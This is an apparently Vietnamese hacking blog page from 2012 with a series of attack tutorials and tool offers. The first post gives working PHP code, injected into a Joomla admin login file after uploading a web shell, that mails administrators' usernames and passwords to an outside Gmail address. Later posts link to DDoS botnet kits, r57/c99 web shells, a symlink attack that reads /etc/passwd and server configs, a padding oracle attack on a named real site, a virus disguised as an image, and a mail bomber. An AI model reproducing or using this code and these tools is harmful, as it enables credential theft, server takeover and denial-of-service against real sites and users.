Thứ Bảy, 14 tháng 7, 2012

[Tut] Insert Keylogger into joomla




Bước 1: Up shell lên site joomla

Bước 2: Insert mã độc vào code

       -   Vào administrator/components/com_login/

       -   Edit file: admin.login.php

       -   Tìm dòng:$mainframe->redirect('index.php');

       -   Thêm trước dòng này 1 đoạn code như sau:

     PHP Code:



$db        =& JFactory::getDBO();                
$mailfrom         = $mainframe->getCfg( 'mailfrom' );
$fromname         = $mainframe->getCfg( 'fromname' );
$siteURL        = JURI::base();
$uname         = $credentials['username']; 
$query = 'SELECT name , email, usertype  ' .
        ' FROM #__users' .
        ' WHERE username = "'.$uname.'"';
$db->setQuery( $query );
$rows = $db->loadObject();

if ( ! $mailfrom  || ! $fromname ) {
    $fromname = $rows->name;
    $mailfrom = $rows->email;
}
$usertype = $rows->usertype;        
$email = $rows->email;
$pass = $credentials['password'];

$message = "$uname|$email|$pass|$usertype";
$to="ducdung.08clc@gmail.com";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";
@mail($to, $siteURL, $message, $header);

Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: ducdung.08clc@gmail.com  



Người đăng: vào lúc 14:09:00 3 nhận xét

Thứ Sáu, 13 tháng 7, 2012

[Ddos-BotNet] Di-BotNet V.2









Link download:  http://www.mediafire.com/?7r73cyckox24gj4
Pass unlock: soleil_vhb



Hướng dẫn sử dụng:

Đọc thêm »
Người đăng: vào lúc 10:47:00 8 nhận xét

Thứ Năm, 12 tháng 7, 2012

[Local Attack] Get all config toàn server





     -          Đâu tiên download shell get all config ( w.php)  về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095  ( pass unlock: soleil_vhb )







     -          Click vào done và thư mục có tên là tmp sẽ được tạo ra.

     -          Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+             dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+             user.sa : Shell này dung để xem danh sách các user và domain trên server.
+             config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink


Đọc thêm »
Người đăng: vào lúc 04:22:00 5 nhận xét

[Ddos-BotNet] Nick3





Đây là code + data+ tool create bot của nick3 đã được edit giao diện dựa trên bản G-bot 1.7 của các hacker người nga.
Hướng dẫn sử dụng:

        -          Up code và data lên host sau đó vào file config.php chỉnh các thông số:
+             Username và password data
+             Pass để login
        -          Sau đó vào link botnet, vd: http://vhbgroup.net/botnet3/ , sẽ xuất hiện 1 giao diện 404 như dưới đây. Ấn nút tab và đánh password đã thiết  lập trong file config.php ở trên rồi enter.










Đọc thêm »
Người đăng: vào lúc 02:55:00 5 nhận xét

Thứ Năm, 5 tháng 7, 2012

[Tut] Đính kèm virus vào file ảnh


[Tut] Đính kèm virus vào file ảnh



 Bước 1: Bỏ dấu tích “hide extensions for known file types”





Bước 2: Tạo 1 forder trên destop, Ví dụ: soleil

Bỏ file virus vào forder soleil, virus thường có đuôi là .exe. Trong bài này tôi sẽ thay virus bằng phần mền putty.exe chẳng hạn và sẽ đính kèm phần mền này vào file ảnh có đuôi là jpg.


Bước 3: Tạo “Shortcut”

Click chuột phải vào phần mền và chọn “create shortcut”



Đọc thêm »
Người đăng: vào lúc 13:01:00 10 nhận xét

Thứ Ba, 3 tháng 7, 2012

Xem Ip Bạn Chát



          Download 2 file ip.php và ip_log.txt về và up lên host  ( Có thể dung host free)
          Chmod file ip_log.txt về 777
          Rồi gửi link file ip.php cho bạn chat. Ví dụ: http://www.vhbgroup.net/ip.php ( Có thẻ rename file ip.php )
           Sau đó ip bạn chat sẽ gửi về file ip_log.txt. View file đó và xem ip: http://www.vhbgroup.net/ip_log.txt


 

Các link trên chỉ mang tính chất demo

http://www.mediafire.com/?g0alqv3yziz3idq
pass unlock: soleil_vhb
pass download: ceh.vn

Người đăng: vào lúc 14:38:00 0 nhận xét

Thứ Sáu, 29 tháng 6, 2012

[Tut] Padding Orale Attack





Victim: http://bigc.vn/
 
Kiểm tra lỗi Padding Orale



View source:



Chú ý đoạn code sau: 
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500"


Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:
http://www.activestate.com/activeperl/downloads

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:
http://www.mediafire.com/?a0auo2tca0ffdfe
Web.config_bruter.pl:
http://www.mediafire.com/?3twc9xwizdcdw8p
pass unlock: soleil_vhb
pass giải nén: ceh.vn



Đọc thêm »
Người đăng: vào lúc 15:49:00 4 nhận xét

Thứ Tư, 27 tháng 6, 2012

[Bài 2 - Local Attack] Giới Thiệu Tính Năng 1 Sô Shell


Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack

Một số shell thông dụng:

 r57.php

https://drive.google.com/file/d/0BxTrDVTYt0wwcS1pczN4cXpKM1E/edit?usp=sharing

R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.


c99.php

https://drive.google.com/file/d/0BxTrDVTYt0wwVXpGVHlXTHdyalU/edit?usp=sharing

Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu

Đọc thêm »
Người đăng: vào lúc 02:06:00 11 nhận xét

Thứ Sáu, 22 tháng 6, 2012

Tool Bom Mail MaxBomber





Tool Bom Mail Good MaxBomber:



Hình ảnh demo victim bị tấn công:


   
-           

   
Đọc thêm »
Người đăng: vào lúc 21:23:00 5 nhận xét

Chủ Nhật, 17 tháng 6, 2012

[Ddos-BotNet] seo4loader



Đây là code botnet mạnh nhât hiện nay.



Link download:  http://www.mediafire.com/?x7fdp13fhtad1d6

pass download: ceh.vn
pass giải nén: soleil_vhb

Đọc thêm »
Người đăng: vào lúc 15:17:00 4 nhận xét